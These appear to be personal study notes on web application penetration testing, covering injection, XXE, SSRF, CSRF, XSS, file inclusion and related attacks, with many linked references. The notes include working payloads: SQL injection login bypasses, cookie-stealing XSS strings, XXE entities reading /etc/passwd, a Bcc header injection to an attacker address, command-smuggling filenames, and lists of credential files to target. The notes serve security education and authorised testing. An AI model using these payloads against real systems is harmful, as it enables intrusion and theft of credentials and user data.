Send an XML file. Perhaps field values are not validated properly, and you can put HTML or Javascript somewhere where it will be displayed/executed later.
OWASP's "Testing for XML Injection (OTG-INPVAL-008)"
Some other file types actually are XML inside, or can contain XML. Such as: .docx, .xlsx, .pptx, .wsdl, .gpx (GPS stuff), .xspf (playlist), .dae (digital asset exchange), many others.

Some image files (PNG) can contain "chunks" that are text or general data. Maybe HTML or scripting can be put into those chunks, or into EXIF ?
PNG (Portable Network Graphics) Specification, Version 1.2 - 4. Chunk Specifications
idontplaydarts' "Encoding Web Shells in PNG IDAT chunks"

Send an archive file (tar, zip, etc) that has filenames inside that have "../" in them ?

Suppose the file is immediately moved somewhere else, using an OS command such as mv or cp ? Give a filename such as "name.jpg;ls;" and see if anything happens.

Sites often use Content Delivery Networks (CDNs), putting user-supplied content on a different domain, to avoid some of these problems. The HTML or code in the file would be "executed" in the domain of the file, not the domain of the page, so would not have access to cookies etc.

Hacking Articles' "5 ways to File upload vulnerability Exploitation"
Hacking Articles' "Web Shells Penetration Testing (Beginner Guide)"
Jean Fleury's "Cross-Site Scripting and File Uploads"
int0x33's "Upload .htaccess as image to bypass filters"
Brute's "File Upload XSS"
OWASP's "Unrestricted File Upload"
Mathias Karlsson and Frans Rosen's "The lesser known pitfalls of allowing file uploads on your website"

Script Injection:
Give Web/App server a request with scripting in parameters or form fields, and get it to return a page containing that scripting.

This is "reflected scripting", and not really valuable in that it's running with your creds and in your browser. But it reveals that the pages or Web/App Server are handling input unsafely.

If you can't get a whole script tag in, maybe you can add an attribute such as onFocus or onLoad or onMouseOver to an existing tag.
Attacker --req with script in params or fields--> Web/App Server
Attacker <--page with script active-- Web/App Server

SQL Injection (SQLi):
Give Web/App server a request with SQL or SQL fragments in parameters or form fields, and see if it sends your SQL to the database.

Examples:
' OR 1=1 --
' OR 1='1
SLEEP(10) /*' or SLEEP(10) or '“ or SLEEP(10) or “*/
1' or '1'='1
admin'--
SELSELECTECT COUNT(*) from USERS;
For username field of a login page:
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
Three phases:
"balance" is where you end the apps SQL gracefully,
"inject" is where you write your own SQL,
"comment" is where you comment out any trailing SQL so it doesn't throw an error.

"Inject" could be a complete new SQL statement, or could be a clause added to the existing statement with UNION or something.

In SQL, a UNION appends output rows from another SELECT to the output rows of the first SELECT. The two SELECTs have to produce the same number and types of columns.

Some forms of SQLi:
The SQL sent to the database could:
"Blind" SQLi is when you can't directly see the result of the SQL operation.

Look for anywhere that the user or client page is specifying SQL terms directly, such as ASC or DESC or a column number for the ORDER BY clause.

It's very helpful to know what type of database server is present; SQL for them varies.

Paraphrased from Zenodermus Javanicus's "Basic of SQL for SQL Injection part 2":
If the input value is enclosed with single quotes in the SQL stmt, a single quote as input will give error.
If the input value is enclosed with double quotes in the SQL stmt, a double quote as input will give error.
If the input value is not enclosed with anything in the SQL stmt, both a single quote or a double quote as input will give error.

Different database server types give different error msg formats; see the article for details.

If you're getting visibility of only a single value, use SQL like:
-- return values starting from row 0, return only 1 row's data
Select Username from users limit 0,1;

If you're getting visibility of only a single row, use SQL like:
-- return values starting from row 0, return only 1 row's data
Select * from users limit 0,1;

Resources:
SQLZoo
SQL Fiddle
Jayson Grace's "SQL Cheatsheet"

Guru99's "SQL Injection Tutorial: Learn with Example"
SQL Injection articles in Hacking Articles' "Web Penetration Testing"
See Chapter 9 "Attacking Data Stores" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon).
Series of 5 articles starting with DRD_'s "Database & SQL Basics Every Hacker Needs to Know"
DRD_'s "Attack Web Applications with Burp Suite & SQL Injection"
Allen Freeman's "The Essential Newbie's Guide to SQL Injections and Manipulating Data in a MySQL Database"
DRD_'s "Use SQL Injection to Run OS Commands & Get a Shell"
Wikipedia's "SQL injection"
Security Idiots' "Posts Related to Web-Pentest-SQL-Injection"

Portswigger's "SQL injection cheat sheet" (probably requires login)
EdOverflow / bugbounty-cheatsheet / SQLI.md
netsparker's "SQL Injection Cheat Sheet"
trietptm / SQL-Injection-Payloads
Polyglot injection strings.
Maybe most likely on pages that are sorting data or showing tables of data.
pentestmonkey's "SQL Injection" cheat sheets
Reiner's "SQLi filter evasion cheat sheet (MySQL)"
Rails SQL Injection"


Server-Side Template Injection (SSTI):
For sites using a server-side template engine such as Flask, Jinja2, Mako, Jade, Ruby, Slim, Velocity, Smarty. Usual telltale is construct like "{{title}}" in the URL or HTML.

Give Web/App Server a request with template code in parameters or form fields, and see if the Template Engine executes the code.
Attacker --req with malicious template code in param--> Web/App Server + Template Engine
Attacker   <--page with template code executed-- Web/App Server + Template Engine

This is "reflected templating", and it's running with your creds. But it reveals that the pages or Web/App Server or Template Engine are handling input unsafely.

Maybe this can be used to get the Template Engine to run code you give it. Depending on how and where the Template Engine is running, this could give access to files or commands on the Web/App Server or Template Engine Server, or enable requests to other servers. If you can modify files on the servers, maybe you can modify pages that are served to other users.

From James Kettle's "Server-Side Template Injection":
"The 'Server-Side' qualifier is used to distinguish this from vulnerabilities in client-side templating libraries such as those provided by jQuery and KnockoutJS."

Sven Morgenroth's "Server-Side Template Injection Introduction & Example"
EdOverflow / bugbounty-cheatsheet / Template Injection
tplmap

Client-Side Template Injection (CSTI):
For sites using a client-side template engine/library such as AngularJS, Angular, React, or Vue. Usual telltale is construct like "{{title}}" in the URL or HTML.

The attack could be: Then the attacker's code is running in the user's browser, and could do a Request Forgery or Browser Exploitation or something.

tijme / angularjs-csti-scanner

Client-side HTTP Parameter Pollution (CSHPP):
Web/App Server expects an HTTP request with parameters, forms request to Back-End Server. But you give it a request with extra or duplicate or malformed parameters, so the request to Back-End Server is malicious.
Attacker --req with malicious params--> Web/App Server --malicious req--> Back-End Server

Server-side HTTP Parameter Pollution (SSHPP):
Back-End Server expects an HTTP request from Web/App Server. But you give it a malicious request directly from your browser with extra or duplicate or malformed parameters, and Back-End Server executes the request.
Attacker --req with malicious params--> Back-End Server

There are other kinds of "injections": LDAP, XPath (XML Path Language; query for XML data), IMAP, SMTP.

Insecure Direct Object Reference (IDOR):
Sometimes called "forced browsing" ?

Parameters in URL or in POST are referencing objects, but the parameters can be changed to reference other objects.

Classic example is an URL like "domain/page?userid=1234&operation=buy". Change userid to another number, do purchase using that user's info.
Attacker --req with changed params--> Web/App Server
zseano's "Insecure Object Reference (IDOR) - Where are they?!"
Hacking Articles' "Beginner Guide to Insecure Direct Object References (IDOR)"

Open Redirect:
Web app page is redirecting the user to some other page, but you find a way to change the redirection so they go to your page. User may not notice that they're no longer in the trusted app.

Several code types that do a redirect: Try changing protocol in the redirect, from HTTPS to HTTP, or HTTP to FTP.

But how do you change a redirect in code supplied to some other user ? I guess you have to do a different exploit to do that.

If code checks that the redirected-to URL is valid, you have to fool that code somehow.

zseano's "Open Url Redirects"
OWASP's "Testing for Client Side URL Redirect (OTG-CLIENT-004)"
OWASP / CheatSheetSeries / Unvalidated_Redirects_and_Forwards_Cheat_Sheet.md



Unsafe API Input Handling

An API essentially is a complete additional attack surface, subject to many of the same vulnerabilities that a web app may have: SQLi, IDOR, etc.

XML External Entities (XXE):
("The 'S' in 'XML' stands for 'Security'.")

XML objects usually contain data, but they can contain items that fetch from a URL or cause execution of code.

(This is similar to Server-Side Request Forgery (SSRF) in that the object usually will be parsed and executed by the web/app server.)

Fetch can be done through defining a new "entity" inside the file, of form
<!ENTITY foo SYSTEM "file:///etc/passwd" >
so that a reference to "&foo;" then causes the file to be fetched. Also
<!ENTITY foo SYSTEM "http://www.example.com/script.php" >

Also send XSLT that generates HTML.

Internal DTD Declaration: inside the XML, add DTD (maybe through a DOCTYPE line that references an external DTD file, or through ENTITY lines) that affects how the XML is parsed and maybe executed.

Some other file types actually are XML inside, or can contain XML. Such as: .docx, .xlsx, .pptx, .wsdl, .gpx (GPS stuff), .xspf (playlist), .dae (digital asset exchange), many others.

The attack could be:
Attacker --XML with malicious content--> API Server
Attacker <--result with secret data-- API Server
This attack could be to an API server, or just a file upload to a file/web server. It's a form of code or script injection, I guess.
klose's "XXE Attacks - Part 1: XML Basics"
Robert Schwass's "XML External Entity - Beyond /etc/passwd (For Fun & Profit)"
EdOverflow / bugbounty-cheatsheet / XXE
EdOverflow / bugbounty-cheatsheet / XSLT Injection
OWASP's "Testing for XML Injection (OTG-INPVAL-008)"

Insecure Deserialization:
Find where an app accepts a serialized object over RPC or out of database or something, and give it a modified or malicious object. The object could have a forged data state, or cause code execution.

Some client-side frameworks which communicate with app server using serialized objects: Flex, Silverlight, Java, Flash.

DSer plug-in to Burp Suite for viewing and manipulating serialized Java objects. Flash AMF support is built into Burp. WCF binary SOAP plug-in for Burp handles Silverlight WCF / NBFS.
Attacker --serialized object with malicious content--> API Server

Linus Sarud's "OWASP TOP 10: Insecure Deserialization"
Aditya Chaudhary's "Insecure Deserialization"

Insecure API:
Many mobile and web-app APIs (RESTful APIs, SOAP, GraphQL, more) involve sending a data or command object (encoded as XML, JSON, HTML, etc) over an HTTP connection. If user-supplied data can get into those objects, maybe something malicious can be done.

A web app function that sends email may feed user input into an SMTP connection. Try appending "%0aBcc:you@attacker.com" to the end of the From address. Try "Cc" instead of "Bcc", try "%0d%0a" instead of "%0a". In the body of the message, you may be able to end one message and start a second different message to a different address.

Look in web server's /.well-known directory for any files that represent API capabilities.
Attacker --object with malicious content--> API Server
or
Attacker --req with malicious params--> Web/App Server --object with malicious content--> API Server

Ole Lensmar's "API Security Testing" (slideshow)
Sharanbasu Panegav's "API Penetration Testing with OWASP 2017 Test Cases"
Viacheslav Dontsov's "API testing: useful tools, Postman tutorial and hints"
Mike Yockey's "API Testing with Postman"
Rushyendra Reddy Induri's "Getting Started with Postman for API Security Testing: Part 1"
Mic Whitehorn-Gillam's "Better API Penetration Testing with Postman - Part 1"
James Messinger's "API testing tips from a Postman professional"
Get Postman for Linux
RESTClient
REST test test ...
Prakash Dhatti's "Penetration Testing RESTful Web Services"
OWASP / CheatSheetSeries / REST_Assessment_Cheat_Sheet.md
Jean Fleury's "Web Services and SOAP Injections"
streaak/keyhacks (ways to test leaked API keys to see if they're valid)

Ajax:
Used inside a web page to make asynchronous requests back to the web/app server. May send XML or JSON or HTTP. Uses XMLHttpRequest object in Javascript.



Exploitation

Directory Traversal:
If you can get access to the filesystem of a server, either via modification of a page, or via unexpected URLs or URL parameters, you can try many different filenames to see if they exist and can be read. And you can add prefixes to the filenames to go up and down in the directory tree.
Attacker --req for file X--> Web/App Server
Attacker <--contents of file X-- Web/App Server
Example prefixes:
../
..\
....//
%2E%2E%2F
..%252f

DRD_'s "Perform Directory Traversal & Extract Sensitive Information"
DRD_'s "How to Find Directories in Websites Using DirBuster"
Look in /robots.txt for stuff that's not supposed to be exposed.

On-site Request Forgery (OSRF) (AKA "session riding"):
Give a user a malicious page or frame from the application, while they're logged into the Web/App Server. Then the malicious code can do application operations using the user's credentials/authentication.

This is called "on-site" or "stored" RF; the malicious code is stored in the database.
Attacker --req with malicious script--> Web/App Server --SQL to store malicious script--> Database Server
User --request--> Web/App Server --SQL--> Database Server
User <--page with malicious script-- Web/App Server <--data containing malicious script-- Database Server
User --request by attacker's script--> Web/App Server
This is attacking the other users, not the underlying application, really. Your script will be executing with their credentials. Of course, if one of them is an admin user, then your script can do more.

Modified from "Penetration Testing" by Georgia Weidman (on Amazon):
"RF exploits a website's trust in the user's browser".

See Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon).

Cross-Site Request Forgery (CSRF or XSRF):
User is logged into the Web/App Server. Get them to open a page from Attacker's Server, and that page does application operations using their credentials/authentication.

This is "cross-site" because the malicious code running in another domain makes a request to the web-app in its domain.

But it's a bit different from reflected XSS in that here the operation is violating same-origin policy: it's coming from a different domain. Apparently SOP only prevents the response back to the browser, not the request. I guess it's up to the web-app to decide if the request is good or bad. The operation has to be accomplished in one request; there is no opportunity for req1-resp1-req2...

From Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon):
The same-origin policy does not prohibit one website from issuing requests to a different domain. It does, however, prevent the originating website from processing the responses to cross-domain requests.


Often this is prevented by using "anti-CSRF tokens", sending a random token from the app server and embedding it in any operation back to the app server. If an app doesn't do this, it may be broken. Relying only on a cookie is not good enough, because the browser will automatically provide that cookie with every request to the domain it is associated with, even if the request originates from another domain.

The anti-CSRF token would be embedded in a POST form back to the server, not a GET. If an app is changing state through GETs, probably something is wrong with the design.
User --request--> Attacker's Server
User <--page with malicious script-- Attacker's Server
User --request by attacker's script--> Web/App Server
This is attacking the other users, not the underlying application, really. Your script will be executing with their credentials. Of course, if one of them is an admin user, then your script can do more.

From "Penetration Testing" by Georgia Weidman (on Amazon):
"CSRF exploits a website's trust in the user's browser".

Sjoerd Langkemper's "Cross site request forgery (CSRF)"
DRD_'s "Manipulate User Credentials with a CSRF Attack"
See Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon).
CSRF articles in Hacking Articles' "Web Penetration Testing"
zseano's "Bypassing CSRF protection"
zseano's "CSRF 'protection' bypass on xvideos"
Trust Foundry's "Cross-Site Request Forgery Cheat Sheet"
debasishm89 / burpy runs on Burp log file, it reports places where CSRF bypass (avoid defenses) might be viable.
Anastasis Vasileiadis' "XSRFProbe - The Prime Cross Site Request Forgery Audit And Exploitation Toolkit"

Common critical functions to try CSRF:

Look for /crossdomain.xml and /clientaccess-policy.xml files.

To test an application's handling of cross-domain requests using XMLHttpRequest, try adding an Origin header specifying a different domain, and examine any Access-Control headers that are returned.

Server-Side Request Forgery (SSRF):
Usually shown as something like "redirect.php?url=http://www.google.com", where the URL comes from the user or the client page somehow, or you can modify it.

Browser requests to Web/App Server, which normally turns around and requests to Back-End Server. Try to modify parameters so Web/App Server requests to some other server, not the Back-End Server. Or submit a "file:///etc/passwd" or "http://localhost/something" "http://127.0.0.1/something" or "telnet://databaseserver" or "http://databaseserver:23/" URL.

This vuln usually shows up where one system talks to another, with some degree of user input or control.

A vuln involving a Post request might be more powerful than a vuln with a Get request, since Post usually is used to write data.
Attacker --req with malicious params--> Web/App Server --malicious req--> File Server

Detectify's "What is server side request forgery (SSRF)?"
EdOverflow / bugbounty-cheatsheet / SSRF.md
Wallarm / SSRF bible
SaN ThosH's "SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1"
SaN ThosH's "SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-2"
SaN ThosH's "SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-3"
Shorebreak Security's "SSRF's up! Real World Server-Side Request Forgery (SSRF)"

Command Injection:
When there is some way for pages to cause the Web/App Server to execute OS commands on its OS, there may be a fault that allows unexpected commands to be run. Any place where a parameter from the user is being used in an OS command gives the chance to terminate that command and add a second command, or add a second argument to the original command.

In PHP, the command primitive isexec(). In ASP, wscript.shell(). In Perl, any command between a set of back-ticks (`).

If a parameter is being passed into a command string, try pipe symbol (|) or double-pipe (||) or ampersand (&) or semi-colon (; or %3b), followed by a command you want to run.

If you can't see the results of a command, try injecting a time-delay. Such as command "ping -c 2 -i 30 -n 127.0.0.1" to delay 30 seconds. Or use a command to create a file which you then can browse to, such as "ls > /var/www/html/foo.txt" or "dir > c:\inetpub\wwwroot\foo.txt" (you have to figure out the OS type and mapping from web root to OS directory). Or use a network command such as TFTP or netcat to contact attacker's server.
Attacker --req to run "cat /etc/passwd"--> Web/App Server
Attacker <--contents of /etc/passwd-- Web/App Server

DRD_'s "Use Command Injection to Pop a Reverse Shell on a Web Server"
Hacking Articles' "Beginner Guide to OS Command Injection"
Carrie Roberts' "OS Command Injection; The Pain, The Gain"
OWASP's "Testing for Command Injection (OTG-INPVAL-013)"
Commix
EdOverflow / bugbounty-cheatsheet / RCE

Privilege Escalation:
If you can get access to the OS level of a server, either via Command Injection from a page, or via Shell Access, maybe you can escalate access from normal user to more powerful user.

On Linux, some standard privilege-escalation paths are: su, sudo, sudoedit, visudo, pkexec, admin:// URI scheme (as in "xed admin:///etc/passwd"), "s" bit in file permissions, cron jobs, putting system in single-user mode (run level 1). Some non-standard or distro-specific or non-Linux commands: calife, op, super, kdesu, kdesudo, ktsuss, beesu, gksu, gksudo, pfexec, in GUI file-explorer or desktop right-click and select "Open as root". For editing specific files: vipw, vigr.

Linux Privilege Escalation articles in Hacking Articles' "Penetration Testing"
TokyoNeon's "How to Perform Privilege Escalation, Part 1 (File Permissions Abuse)"
TokyoNeon's "How to Perform Privilege Escalation, Part 2 (Password Phishing)"
DRD_'s "Perform Local Privilege Escalation Using a Linux Kernel Exploit"
Barrow's "Use a Misconfigured SUID Bit to Escalate Privileges & Get Root"
OccupyTheWeb's "Finding Potential SUID/SGID Vulnerabilities on Linux & Unix Systems"
Bill Tsapalos's "Hack Metasploitable 2 Including Privilege Escalation"
Rashid Feroze's "A guide to Linux Privilege Escalation"
Once you have root privilege: int0x33's "Privilege Escalation (Linux) by Modifying Shadow File for the Easy Win"

Remote Code Execution (RCE):
The ultimate achievement, especially if it's with root privilege. A request across the internet causes execution of an OS command or other code on the target. The code could create, update or delete files, exfiltrate files or information, open a remote shell, attack other machines on the LAN, etc.

Really this is a form of Command Injection, coming from outside.



Combined / Other

Cross-Site Scripting (XSS):
A confusing mega-term that has grown over the years, and often in ways that don't match the name at all. Some forms of it are not "cross-site", and some forms don't involve scripting. And it mixes two steps: input and exploitation.

XSS is targeting an individual user, usually putting a malicious page or script in their browser.

From Portswigger's "Web Security Academy":
[XSS] is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data.

Some forms of XSS: So each of these involves a first step to get bad data in (bad parameters, SQLi, Script Injection, Template Injection, etc) and then a second step to do exploitation (Request Forgery or redirection or other).

[For reflected and DOM-based XSS:]
From Chapter 12 "Attacking Users: Cross-Site Scripting" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon):
... you may be forgiven for wondering why, if the attacker can induce the user to visit a URL of his choosing, he bothers with the rigamarole of transmitting his malicious JavaScript via the XSS bug in the vulnerable application. Why doesn't he simply host a malicious script on attacker.com and feed the user a direct link to this script? Wouldn't this script execute in the same way as it does in the example described?

To understand why the attacker needs to exploit the XSS vulnerability, recall the same-origin policy that was described in Chapter 3. Browsers segregate content that is received from different origins (domains) in an attempt to prevent different domains from interfering with each other within a user's browser. The attacker's objective is not simply to execute an arbitrary script but to capture the user's session token. Browsers do not let just any old script access a domain's cookies; otherwise, session hijacking would be easy. Rather, cookies can be accessed only by the domain that issued them. They are submitted in HTTP requests back to the issuing domain only, and they can be accessed via JavaScript contained within or loaded by a page returned by that domain only. Hence, if a script residing on attacker.com queries document.cookie, it will not obtain the cookies issued by webapp.com, and the hijacking attack will fail.

The reason why the attack that exploits the XSS vulnerability is successful is that, as far as the user's browser is concerned, the attacker's malicious JavaScript was sent to it by webapp.com ... This is why the attacker's script, although it actually originates elsewhere, can gain access to the cookies issued by webapp.com. This is also why the vulnerability itself has become known as cross-site scripting.

Another factor is that the link or page-URL the user sees is that of the (trusted) Web/App Server. The link may come to the user via email or by seeing it on Attacker's Server somehow, or from a page or message in the application, but user trusts it because it points to the real application.

From "Penetration Testing" by Georgia Weidman (on Amazon):
"Cross-site scripting exploits the trust a user has in a website".

Possible payloads/effects of exploiting XSS:

How to approach a web page to look for XSS, from Hacker101 - XSS and Authorization (video):


Excess XSS
Wikipedia's "Cross-site scripting"
OWASP's "Cross-site Scripting (XSS)"
Jean Fleury's "A Not-So-Brief Overview of Cross-Site Scripting"
Jean Fleury's "ClickJacking vs Cross Site Request Forgery"
Kurt Muhl's "Cross-site scripting: How to go beyond the alert"
zseano's "Cross Site Scripting (XSS) - The famous alert"
zseano's "XML XSS via POST"
zseano's "Stored XSS 'domain takeover'
XSS articles in Hacking Articles' "Web Penetration Testing"
DRD_'s "Discover XSS Security Flaws by Fuzzing with Burp Suite, Wfuzz & XSStrike"
DRD_'s "Advanced Techniques to Bypass & Defeat XSS Filters, Part 1"
DRD_'s "Advanced Techniques to Bypass & Defeat XSS Filters, Part 2"
EvilToddler's "Find XSS Vulnerable Sites with the Big List of Naughty Strings"
Joe Smith's "Cross Site Scripting (XSS) Basics"
Alex Long's "Use JavaScript Injections to Locally Manipulate the Websites You Visit"
Alex Long's "How Cross-Site Scripting (XSS) Attacks Sneak into Unprotected Websites (Plus: How to Block Them)"
CrackerHacker's "Exploiting XSS with BEEF (Part 1)"
DomGoat's "Client XSS Introduction"
Bugcrowd University - Cross Site Scripting (XSS) (video)
xssed.com (stale)
reddit's /r/xss might have some bugs posted but the bounty not claimed
Brute's "XSS 101"
Brute's "The 7 Main XSS Cases Everyone Should Know"
Brute's "Probing to Find XSS"
Brute's "File Upload XSS"
Brute's "Using XSS to Control a Browser"
Holly Graceful's "ClickJacking and JavaScript KeyLogging in Iframes"
See Chapter 12 "Attacking Users: Cross-Site Scripting" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon).
Security Idiots' "Posts Related to Web-Pentest-XSS"

Sites that often are vulnerable: sites that allow users to edit themes, or add CSS, or set event/meeting name, or show your Facebook page in a frame, or specify filename for uploading, or set a custom Error page.
"Multi-context polyglot payload": String that tries to work in many different contexts, so you don't spend a lot of times trying many approaches.

Tools, mostly:

XSS.Cx (a Crawler and Injection Reporting Tool)
int0x33 / 420 (Automated XSS Vulnerability Finder)
XSS Chef (generate HTML and script payloads to order)

Payloads, mostly:

Code to put (one at a time) into URL parameters and form fields, and see if they execute or come back in the page source:
"><h1>test</h1>
<iframe src=javascript:alert(1)>
'+alert(1)+'
';alert(1)//
\';alert(1)//
${alert(1)}
"onmouseover="alert(1)
" autofocus onfocus=alert(1) x="
http://"onmouseover="alert(1)
<marquee onstart=alert(1)>test</marquee>
"><script>alert(document.cookie)</script>
"><script >alert(document.cookie)</script >
"><ScRiPt>alert(document.cookie)</ScRiPt>
"%3e%3cscript%3ealert(document.cookie)%3c/script%3e
"><scr<script>ipt>alert(document.cookie)</scr</script>ipt>
%00"><script>alert(document.cookie)</script>
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
# fake URL param "foo":
?realparam=1&foo=bar’+alert(/XSS/)+’
EdOverflow / bugbounty-cheatsheet / xss.md
RSnake's "XSS cheatsheet"
OWASP's "XSS Filter Evasion Cheat Sheet"
int0x33's "XSS Payloads, getting past alert(1)"
XSS Payloads
Jack Masa's XSS Mindmap
Pgaijin66 / XSS-Payloads
0xSobky / HackVault / Unleashing an Ultimate XSS Polyglot

Paraphrased from Chapter 12 "Attacking Users: Cross-Site Scripting" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon):

You can introduce script code into an HTML page in four broad ways: Also, change the base path used for relative URLs:
<base href="http://attacker.com/badscripts/">
...
<script src="goodscript.js"></script>


Cross-Site Leaking (XS-Leak, XS-Search):
A new and growing set of techniques, where code from one site finds out information about activity from another site. For example, clear browser cache, have user load a page, see if a certain image appears in the cache.

James Walker's "New XS-Leak techniques reveal fresh ways to expose user information"

File Inclusion (LFI, RFI):
This could cause "file execution" or "file viewing".

For execution: Some languages let the server-side scripting do an "include" of a file's contents into the executable of the script. Trick the code into using your file, or rewrite the contents of the file it already uses.

For viewing: Where the code expects the path of some user-uploaded file (such as a CV/resume, or a message attachment), give it the path of some app or system file (such as /etc/passwd).

Good files to get on Linux: /etc/passwd, /etc/shadow, /proc/version, /proc/self/version, /proc/sched_debug, /proc/mounts.

There are several different ways to accomplish this:

If you can change the filename used, you can change it to name of a:
URL parameters likely to do a file inclusion:

Wikipedia's "File inclusion vulnerability"
EdOverflow / bugbounty-cheatsheet / LFI
Asfiya Shaikh's "File Path Traversal and File Inclusions"
Jean Fleury's "Finally, My First Bug Bounty Write Up (LFI)"
George Mauer's "The Absurdly Underestimated Dangers of CSV Injection"
LFI/RFI articles in Hacking Articles' "Web Penetration Testing"
OWASP's "Testing for Local File Inclusion"
OWASP's "Testing for Remote File Inclusion"
WASC's "Remote File Inclusion"
Kevin Burns' "Directory Traversal, File Inclusion, and The Proc File System"
Arr0way's "LFI Cheat Sheet"

From Bbinfosec's "Collection Of Bug Bounty Tip - Will Be updated daily":
"If you find a LFI, ignore /etc/passwd and go for /var/run/secrets/kubernetes.io/serviceaccount This will raise the severity when you hand them a Kubernetes token or cert." [Also look for ~/.aws/credentials]



Insecure CORS (Cross Origin Resource Sharing):
Browsers enforce "same-origin policy", which means a resource can be accessed from a page only if protocols (HTTP, HTTPS) match, port numbers (80, 443, etc) match, and domains match exactly. But developers can weaken this by using messaging (postMessage), or by changing document.domain in the DOM, or by using CORS (XMLHttpRequests to domains outside your origin, using special headers).

Access-Control-Allow-Origin
wikipedia's "Cross-origin resource sharing"
James Kettle's "Exploiting CORS misconfigurations for Bitcoins and bounties"
Geekboy's "Exploiting Misconfigured CORS (Cross Origin Resource Sharing)"
Suyog Palav's "Exploitation of Mis-configured Cross-Origin Resource Sharing (CORS)"
Muhammad Khizer Javed's "Exploiting Insecure Cross Origin Resource Sharing (CORS)"
Brute's "Cross-Origin Scripting"



Cookie Tampering:
Edit application's cookie on the client side, to see what happens if you delete or add or modify components/parameters. Use Firefox's development tools, or use Burp to catch the response headers and modify the cookie there. You need to catch the setting of the cookie, the first time that is done.

Try changing the order of parameters in the cookie, or adding duplicate parameters, to see what happens. Set illegal values, or additional parameters with new names. If you get errors back from the web/app server, that could give you useful info.

An app should be setting the HTTPOnly and Secure flags on the cookie. If HTTPOnly isn't set, client-side Javascript can read and modify the cookie. If Secure isn't set, the cookie can be used in HTTP as well as in HTTPS.

If you see any encoded data in the cookie, definitely try to decode it, it should be something important. If it ends in "=" or contains "/", it's probably Base64 encoded. If it's all hex digits, usually all-uppercase or all-lowercase, it's probably hex-encoded. 32-40 nybbles of hex, probably a hash.

It's not a vuln if you can copy a cookie between two sessions that you started for different users, and suddenly user2 has the permissions of user1. It is a vuln if you can get that to happen without having access to both machines/browsers.

Hacker101 - Cookie Tampering Techniques (video)



Wordpress:
Ceos3c's "How to hack a WordPress Website"
Sebastian Vargas's "Hardening WordPress Like a Boss"
Hacking Articles' "WordPress Penetration Testing using WPScan & Metasploit"
Wordpress articles in Hacking Articles' "Web Penetration Testing"
Brute's "Compromising CMSes with XSS"
See WordPress tools section.



CMS:
Brute's "Compromising CMSes with XSS"



Apache:
OccupyTheWeb's "Linux Basics for the Aspiring Hacker, Part 11 (Apache Web Servers)"
OccupyTheWeb's "Linux Basics for the Aspiring Hacker: Configuring Apache"



Application logic attacks:
There is no magic cheatsheet for this kind of attack/exploit. You have to study the application and try to do unexpected things.

Some examples: See Chapter 11 "Attacking Application Logic" in "The Web Application Hacker's Handbook" by Stuttard and Pinto (on Amazon).



Client-Side SQL Injection / Local Storage:
HTML5 supports client-side SQL databases, which applications can use to store data on the client.

Maybe explore what is stored there for the attacker-as-normal-user, and see how the client-side code manipulates it. Look for places where URL parameters or user input get into the database. Then try to do a sort of "reflected SQL injection", where parameters given to user result in SQL that extracts data and sends it to attacker ?

See Chapter 13 "Attacking Users: Other Techniques" in "The Web Application Hacker's Handbook" by Stuttard and Pinto.


Flash, Silverlight, and Internet Explorer have their own local storage mechanisms.

HTML5 has local storage mechanisms.
tutorialspoint's "HTML5 - Web Storage"



Macro Mosaic's "Hack SAML Single Sign-on with Burp Suite"

Barrow's "Use Remote Port Forwarding to Slip Past Firewall Restrictions Unnoticed"

CrackerHacker's "Upload a Shell to a Web Server and Get Root (RFI): Part 1"
CrackerHacker's "Upload a Shell to a Web Server and Get Root (RFI): Part 2"

Ceos3c's "Obtaining Domain Credentials through a Printer with Netcat"
Printer Exploitation Toolkit

Weird forms of IP address (overflows, different bases, etc) or domain name, to get past a blacklist or filter. Called "URL obfuscation" ?

Cache poisoning: if there is a cache between clients and server, set HTML request headers such as X-Host, X-Forwarded-Host, X-Original-Url, X-Rewrite-URL, and cache returns malicious data. Need to know which headers and parameters are used in cache matching (which are in the cache key). Use Param Miner extension for Burp.
posrtswigger.net/blog/practical-web-cache-poisoning

Some ways of transferring a file to a target: FTP, SFTP, TFTP, SCP, WebDAV, shell (run netcat or ncat or something), file-share (NFS, Samba, etc), web app's Upload/Attachment features, object API (SOAP, REST) over HTTP.

Some ways of connecting to a target: HTTP, Telnet, RDP, SSH, VNC, TeamViewer.

EdOverflow / bugbounty-cheatsheet / CRLF Injection || HTTP Response Splitting

EdOverflow / bugbounty-cheatsheet / Open Redirect

Jayson Grace's "Web Application Penetration Testing Notes"
Jayson Grace's "Pentesting notes and snippets"
Arr0way's "Penetration Testing Tools Cheat Sheet"
Raj Chandel's "Hacking Articles"

swisskyrepo / PayloadsAllTheThings

amanvir's "Security Issues in Modern JavaScript"

Shankar R's "Bug Hunting Methodology(Part-3)" (tips and snippets)



When you think you've found a bug:
Gather as much sensitive data as you can. Can you list all users ? Get passwords for user accounts or for accounts on other systems or services ? Get log files ? Get configuration files that show other network devices ? Get PII for users ? Get version numbers of OS and software ? Get encrypted files to try to crack later ?

Can you use this to do another exploit, a better one ?

Kunal Pandey's "Avoid rookie mistakes and progress positively in bug bounty"

Does the same bug exist in other apps that use the same module ?
Offensive Security by Automation's "Open Redirection: A Case Study"


Interesting thoughts: LiveOverflow's "What is a Security Vulnerability?" (video)







Attack Tips and Tactics





Quick try at a site, from Jason Haddix's "How To Shot Web" (PDF):
  1. Visit the search, registration, contact, password reset, and comment forms and hit them with your polyglot (XSS) strings.

